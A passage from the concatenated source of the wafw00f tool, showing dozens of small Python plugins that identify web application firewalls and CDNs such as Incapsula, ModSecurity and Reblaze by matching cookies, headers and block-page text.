 6 | 
 7 | NAME = 'Incapsula (Imperva Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^incap_ses.*?='),
13 |         self.matchCookie(r'^visid_incap.*?='),
14 |         self.matchContent(r'incapsula incident id'),
15 |         self.matchContent(r'powered by incapsula'),
16 |         self.matchContent(r'/_Incapsula_Resource')
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/indusguard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'IndusGuard (Indusface)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'IF_WAF')),
13 |         self.matchContent(r'This website is secured against online attacks. Your request was blocked')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/instartdx.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Instart DX (Instart Logic)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchHeader(('X-Instart-Request-ID', '.+')),
13 |         self.matchHeader(('X-Instart-Cache', '.+')),
14 |         self.matchHeader(('X-Instart-WL', '.+'))
15 |     ]
16 |     schema2 = [
17 |         self.matchContent(r'the requested url was rejected'),
18 |         self.matchContent(r'please consult with your administrator'),
19 |         self.matchContent(r'your support id is')
20 |     ]
21 |     if any(i for i in schema1):
22 |         return True
23 |     if all(i for i in schema2):
24 |         return True
25 |     return False
26 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/isaserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ISA Server (Microsoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'The.{0,10}?(isa.)?server.{0,10}?denied the specified uniform resource locator \(url\)'),
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/janusec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Janusec Application Gateway (Janusec)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'janusec application gateway')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/jiasule.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Jiasule (Jiasule)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'jiasule\-waf')),
13 |         self.matchCookie(r'^jsl_tracking(.+)?='),
14 |         self.matchCookie(r'__jsluid='),
15 |         self.matchContent(r'notice\-jiasule'),
16 |         self.matchContent(r'static\.jiasule\.com')
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/keycdn.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'KeyCDN (KeyCDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'KeyCDN'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/knownsec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'KS-WAF (KnownSec)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'/ks[-_]waf[-_]error\.png')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/kona.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | 
 4 | # !/usr/bin/env python
 5 | '''
 6 | Copyright (C) 2020, WAFW00F Developers.
 7 | See the LICENSE file for copying permission.
 8 | '''
 9 | 
10 | NAME = 'Kona SiteDefender (Akamai)'
11 | 
12 | 
13 | def is_waf(self):
14 |     schemes = [
15 |         self.matchHeader(('Server', 'AkamaiGHost')),
16 |         self.matchHeader(('Server', 'AkamaiGHost'), attack=True)
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/limelight.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'LimeLight CDN (LimeLight)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^limelight'),
13 |         self.matchCookie(r'^l[mg]_sessid=')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/litespeed.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'LiteSpeed (LiteSpeed Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchHeader(('Server', 'LiteSpeed')),
13 |         self.matchStatus(403)
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'Proudly powered by litespeed web server'),
17 |         self.matchContent(r'www\.litespeedtech\.com/error\-page')
18 |     ]
19 |     if all(i for i in schema1):
20 |         return True
21 |     if any(i for i in schema2):
22 |         return True
23 |     return False
24 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/malcare.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Malcare (Inactiv)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'firewall.{0,15}?powered.by.{0,15}?malcare.{0,15}?pro'),
13 |         self.matchContent('blocked because of malicious activities')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/maxcdn.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'MaxCDN (MaxCDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-CDN', r'maxcdn'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/missioncontrol.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Mission Control Shield (Mission Control)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Mission Control Application Shield'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/modsecurity.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ModSecurity (SpiderLabs)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchHeader(('Server', r'(mod_security|Mod_Security|NOYB)')),
13 |         self.matchContent(r'This error was generated by Mod.?Security'),
14 |         self.matchContent(r'rules of the mod.security.module'),
15 |         self.matchContent(r'mod.security.rules triggered'),
16 |         self.matchContent(r'Protected by Mod.?Security'),
17 |         self.matchContent(r'/modsecurity[\-_]errorpage/'),
18 |         self.matchContent(r'modsecurity iis')
19 |     ]
20 |     schema2 = [
21 |         self.matchReason('ModSecurity Action'),
22 |         self.matchStatus(403)
23 |     ]
24 |     schema3 = [
25 |         self.matchReason('ModSecurity Action'),
26 |         self.matchStatus(406)
27 |     ]
28 |     if any(i for i in schema1):
29 |         return True
30 |     if all(i for i in schema2):
31 |         return True
32 |     if all(i for i in schema3):
33 |         return True
34 |     return False
35 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/naxsi.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NAXSI (NBS Systems)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Data-Origin', r'^naxsi(.+)?')),
13 |         self.matchHeader(('Server', r'naxsi(.+)?')),
14 |         self.matchContent(r'blocked by naxsi'),
15 |         self.matchContent(r'naxsi blocked information')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/nemesida.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Nemesida (PentestIt)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'@?nemesida(\-security)?\.com'),
13 |         self.matchContent(r'Suspicious activity detected.{0,10}?Access to the site is blocked'),
14 |         self.matchContent(r'nwaf@'),
15 |         self.matchStatus(222)
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/netcontinuum.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NetContinuum (Barracuda Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^NCI__SessionId=')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/netscaler.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NetScaler AppFirewall (Citrix Systems)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # This header can be obtained without attack mode
13 |         self.matchHeader(('Via', r'NS\-CACHE')),
14 |         # Cookies are set only when someone is authenticated.
15 |         # Not much reliable since wafw00f isn't authenticating.
16 |         self.matchCookie(r'^(ns_af=|citrix_ns_id|NSC_)'),
17 |         self.matchContent(r'(NS Transaction|AppFW Session) id'),
18 |         self.matchContent(r'Violation Category.{0,5}?APPFW_'),
19 |         self.matchContent(r'Citrix\|NetScaler'),
20 |         # Reliable but not all servers return this header
21 |         self.matchHeader(('Cneonction', r'^(keep alive|close)'), attack=True),
22 |         self.matchHeader(('nnCoection', r'^(keep alive|close)'), attack=True)
23 |     ]
24 |     if any(i for i in schemes):
25 |         return True
26 |     return False
27 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/nevisproxy.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NevisProxy (AdNovum)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^Navajo'),
13 |         self.matchCookie(r'^NP_ID')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/newdefend.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Newdefend (NewDefend)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # This header can be obtained without attack mode
13 |         # Most reliable fingerprint
14 |         self.matchHeader(('Server', 'Newdefend')),
15 |         # Reliable ones within blockpage
16 |         self.matchContent(r'www\.newdefend\.com/feedback'),
17 |         self.matchContent(r'/nd\-block/')
18 |     ]
19 |     if any(i for i in schemes):
20 |         return True
21 |     return False
22 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/nexusguard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NexusGuard Firewall (NexusGuard)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'Powered by Nexusguard'),
13 |         self.matchContent(r'nexusguard\.com/wafpage/.+#\d{3};')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/ninja.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NinjaFirewall (NinTechNet)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<title>NinjaFirewall.{0,10}?\d{3}.forbidden'),
13 |         self.matchContent(r'For security reasons?.{0,10}?it was blocked and logged')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/nsfocus.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NSFocus (NSFocus Global Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'NSFocus'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/nullddos.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'NullDDoS Protection (NullDDoS)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'NullDDoS(.System)?'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/onmessage.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'OnMessage Shield (BlackBaud)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Engine', 'onMessage Shield')),
13 |         self.matchContent(r'Blackbaud K\-12 conducts routine maintenance'),
14 |         self.matchContent(r'onMessage SHEILD'),
15 |         self.matchContent(r'maintenance\.blackbaud\.com'),
16 |         self.matchContent(r'status\.blackbaud\.com')
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/openresty.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Open-Resty Lua Nginx (FLOSS)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchHeader(('Server', r'^openresty/[0-9\.]+?')),
13 |         self.matchStatus(403)
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'openresty/[0-9\.]+?'),
17 |         self.matchStatus(406)
18 |     ]
19 |     if all(i for i in schema1):
20 |         return True
21 |     if all(i for i in schema2):
22 |         return True
23 |     return False
24 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/oraclecloud.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Oracle Cloud (Oracle)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<title>fw_error_www'),
13 |         self.matchContent(r'src=\"/oralogo_small\.gif\"'),
14 |         self.matchContent(r'www\.oracleimg\.com/us/assets/metrics/ora_ocom\.js')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/paloalto.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers 
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Palo Alto Next Gen Firewall (Palo Alto Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'Download of virus.spyware blocked'),
13 |         self.matchContent(r'Palo Alto Next Generation Security Platform')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/pentawaf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'PentaWAF (Global Network Services)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'PentaWaf(/[0-9\.]+)?')),
13 |         self.matchContent(r'Penta.?Waf/[0-9\.]+?.server')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/perimeterx.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'PerimeterX (PerimeterX)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'www\.perimeterx\.(com|net)/whywasiblocked'),
13 |         self.matchContent(r'client\.perimeterx\.(net|com)'),
14 |         self.matchContent(r'denied because we believe you are using automation tools')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/pksec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'pkSecurity IDS (pkSec)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchContent(r'pk.?Security.?Module'),
13 |         self.matchContent(r'Security.Alert')
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'As this could be a potential hack attack'),
17 |         self.matchContent(r'A safety critical (call|request) was (detected|discovered) and blocked'),
18 |         self.matchContent(r'maximum number of reloads per minute and prevented access')
19 |     ]
20 |     if any(i for i in schema2):
21 |         return True
22 |     if all(i for i in schema1):
23 |         return True
24 |     return False
25 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/powercdn.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'PowerCDN (PowerCDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Via', r'(.*)?powercdn.com(.*)?')),
13 |         self.matchHeader(('X-Cache', r'(.*)?powercdn.com(.*)?')),
14 |         self.matchHeader(('X-CDN', r'PowerCDN'))
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/profense.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Profense (ArmorLogic)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Profense')),
13 |         self.matchCookie(r'^PLBSID=')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/ptaf.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'PT Application Firewall (Positive Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<h1.{0,10}?Forbidden'),
13 |         self.matchContent(r'<pre>Request.ID:.{0,10}?\d{4}\-(\d{2})+.{0,15}?pre>')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/puhui.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Puhui (Puhui)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'Puhui[\-_]?WAF'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/qiniu.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Qiniu (Qiniu CDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Qiniu-CDN', r'\d+?'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/radware.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'AppWall (Radware)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchContent(r'CloudWebSec\.radware\.com'),
13 |         self.matchHeader(('X-SL-CompState', '.+'))
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'because we have detected unauthorized activity'),
17 |         self.matchContent(r'<title>Unauthorized Request Blocked'),
18 |         self.matchContent(r'if you believe that there has been some mistake'),
19 |         self.matchContent(r'\?Subject=Security Page.{0,10}?Case Number')
20 |     ]
21 |     if any(i for i in schema1):
22 |         return True
23 |     if all(i for i in schema2):
24 |         return True
25 |     return False
26 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/reblaze.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Reblaze (Reblaze)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchCookie(r'^rbzid'),
13 |         self.matchHeader(('Server', 'Reblaze Secure Web Gateway'))
14 |     ]
15 |     schema2 = [
16 |         self.matchContent(r'current session has been terminated'),
17 |         self.matchContent(r'do not hesitate to contact us'),
18 |         self.matchContent(r'access denied \(\d{3}\)')
19 |     ]
20 |     if any(i for i in schema1):
21 |         return True
22 |     if all(i for i in schema2):
23 |         return True
24 |     return False
25 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/rsfirewall.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'RSFirewall (RSJoomla!)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'com_rsfirewall_(\d{3}_forbidden|event)?')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/rvmode.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'RequestValidationMode (Microsoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'Request Validation has detected a potentially dangerous client input'),
13 |         self.matchContent(r'ASP\.NET has detected data in the request'),
14 |         self.matchContent(r'HttpRequestValidationException')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/sabre.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Sabre Firewall (Sabre)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchContent(r'dxsupport\.sabre\.com')
13 |     ]
14 |     schema2 = [
15 |         self.matchContent(r'<title>Application Firewall Error'),
16 |         self.matchContent(r'add some important details to the email for us to investigate')
17 |     ]
18 |     if any(i for i in schema1):
19 |         return True
20 |     if all(i for i in schema2):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/safe3.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Safe3 Web Firewall (Safe3)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Safe3 Web Firewall')),
13 |         self.matchHeader(('X-Powered-By', r'Safe3WAF/[\.0-9]+?')),
14 |         self.matchContent(r'Safe3waf/[0-9\.]+?')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/safedog.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Safedog (SafeDog)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^safedog\-flow\-item='),
13 |         self.matchHeader(('Server', 'Safedog')),
14 |         self.matchContent(r'safedogsite/broswer_logo\.jpg'),
15 |         self.matchContent(r'404\.safedog\.cn/sitedog_stat.html'),
16 |         self.matchContent(r'404\.safedog\.cn/images/safedogsite/head\.png')
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/safeline.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Safeline (Chaitin Tech.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'safeline|<!\-\-\sevent id:')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/secking.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'SecKing (SecKing)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'secking(.?waf)?'))
13 |     ]
